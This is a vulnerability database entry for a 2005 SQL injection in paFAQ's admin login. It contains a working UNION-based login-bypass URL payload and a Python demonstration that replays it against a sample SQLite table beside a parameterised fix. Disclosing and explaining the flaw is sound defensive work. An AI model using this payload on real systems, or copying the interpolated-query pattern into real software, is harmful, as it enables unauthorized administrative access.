paFAQ index.php username Variable SQL Injection

2005-06-20T06:16:27
ID OSVDB:17564
Type osvdb
Reporter James Bercegay
Modified 2005-06-20T06:16:27

Description

Vulnerability Description

paFAQ contains a flaw that may allow an attacker to carry out an SQL injection attack. The issue is due to the admin/index.php script (act=login) not properly sanitizing user-supplied input to the 'username' variable before using it in a database query. This allows an attacker to inject or manipulate SQL queries in the backend database; the manual testing note below demonstrates the concrete impact, a bypass of the administrative login.

Technical Description

To exploit this issue, "magic_quotes_gpc" must be off in php.ini, because the payload depends on an unescaped single quote reaching the query (magic quotes would escape it as \'). The original advisory notes that this option appears to be the default setting. Magic quotes were removed entirely in PHP 5.4, so on later interpreters the setting cannot be relied on as a mitigation at all.

Solution Description

Currently, there are no known upgrades, patches, or workarounds available to correct this issue.

Short Description

paFAQ contains a flaw that may allow an attacker to carry out an SQL injection attack. The issue is due to the index.php script not properly sanitizing user-supplied input to the 'username' variable. This may allow an attacker to inject or manipulate SQL queries in the backend database.

Manual Testing Notes

http://[victim]/admin/index.php?act=login&username='%20UNION%20SELECT%20id,name,'3858f62230ac3c915f300c664312c63f',email,notify,permissions,session%20FROM%20pafaq_admins%20WHERE%201/*&password=foobar

How the payload works: the injected username closes the string literal, UNIONs in a copy of the pafaq_admins rows (WHERE 1 matches every row) with the password column replaced by 3858f62230ac3c915f300c664312c63f, which is the MD5 of "foobar", and comments out the remainder of the original query with /*. The application then compares the MD5 of the supplied password against the manufactured row and accepts the login as the first administrator returned, without the attacker knowing any real credential.
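The following is an added example, not paFAQ's code or part of the original advisory. It reproduces the login bypass described above against a constructed in-memory SQLite table, using the payload from the testing note verbatim, and places it beside the parameterised query that closes the hole. The table layout (id, name, password, email, notify, permissions, session) and the shape of the login check (fetch by username, then compare the MD5 in application code) are assumptions chosen to match the seven columns the payload selects; they are not paFAQ's real schema or logic. Note that the same payload would fail if magic quotes turned the leading quote into \', which is why the advisory makes exploitation conditional on that setting.

```python
import hashlib
import sqlite3

# Payload copied from the Manual Testing Notes (URL-decoded). The quoted
# 32-hex-character string is md5("foobar"), so the row the UNION manufactures
# carries a password hash the attacker already knows the preimage of.
PAYLOAD = ("' UNION SELECT id,name,'3858f62230ac3c915f300c664312c63f',"
           "email,notify,permissions,session FROM pafaq_admins WHERE 1/*")

# Column order used by the assumed schema below: password is the 3rd column,
# which is where the payload puts its chosen hash.
QUERY_COLUMNS = "id, name, password, email, notify, permissions, session"


def md5_hex(password: str) -> str:
    """Hash a password the way the (assumed) application does: unsalted MD5."""
    return hashlib.md5(password.encode()).hexdigest()


def make_db() -> sqlite3.Connection:
    """Constructed sample database. The schema is an assumption that matches the
    seven columns the payload selects; it is not paFAQ's schema."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE pafaq_admins ("
        "id INTEGER, name TEXT, password TEXT, email TEXT, "
        "notify INTEGER, permissions TEXT, session TEXT)"
    )
    # The real administrator's password is unknown to the attacker.
    conn.execute(
        "INSERT INTO pafaq_admins VALUES (1, 'admin', ?, "
        "'admin@example.invalid', 1, 'all', '')",
        (md5_hex("correct horse battery staple"),),
    )
    conn.commit()
    return conn


def vulnerable_login(conn, username: str, password: str):
    """Assumed shape of the flawed check: the username is interpolated straight
    into the SQL string, then the MD5 of the supplied password is compared
    against whatever row comes back. Returns the admin name on success."""
    sql = ("SELECT %s FROM pafaq_admins WHERE name = '%s'"
           % (QUERY_COLUMNS, username))
    # With PAYLOAD this becomes:
    #   ... WHERE name = '' UNION SELECT id,name,'3858...',... WHERE 1/*'
    # The first SELECT matches nothing; the UNION supplies the admin row
    # with the attacker's hash; /* swallows the trailing quote.
    row = conn.execute(sql).fetchone()
    if row is None:
        return None
    if row[2] == md5_hex(password):
        return row[1]
    return None


def safe_login(conn, username: str, password: str):
    """Same logic with the username bound as a query parameter. The payload is
    now an ordinary string compared against the name column and matches no
    row, so there is nothing to authenticate against."""
    sql = "SELECT %s FROM pafaq_admins WHERE name = ?" % QUERY_COLUMNS
    row = conn.execute(sql, (username,)).fetchone()
    if row is None:
        return None
    if row[2] == md5_hex(password):
        return row[1]
    return None


if __name__ == "__main__":
    conn = make_db()
    print("vulnerable, payload  + foobar:", vulnerable_login(conn, PAYLOAD, "foobar"))
    print("vulnerable, 'admin'  + foobar:", vulnerable_login(conn, "admin", "foobar"))
    print("parameterised, payload       :", safe_login(conn, PAYLOAD, "foobar"))
```

Running the block prints `admin` for the first line and `None` for the other two: the interpolated query authenticates the attacker as the first administrator, the honest guess of "foobar" against the real account fails, and the parameterised version is unaffected by the payload. The fix is binding, not escaping; a later PHP version with magic quotes removed makes the escaping path disappear silently.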

References:

Vendor URL: http://www.phparena.net/pafaq.php
Security Tracker: 1014248
Related OSVDB ID: 17563
Related OSVDB ID: 17565
Related OSVDB ID: 17566
Related OSVDB ID: 17567
Other Advisory URL: http://www.gulftech.org/?node=research&article_id=00083-06202005
Nessus Plugin ID: 18535
Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2005-06/0155.html
ISS X-Force ID: 21077
CVE: CVE-2005-2012
Bugtraq ID: 14003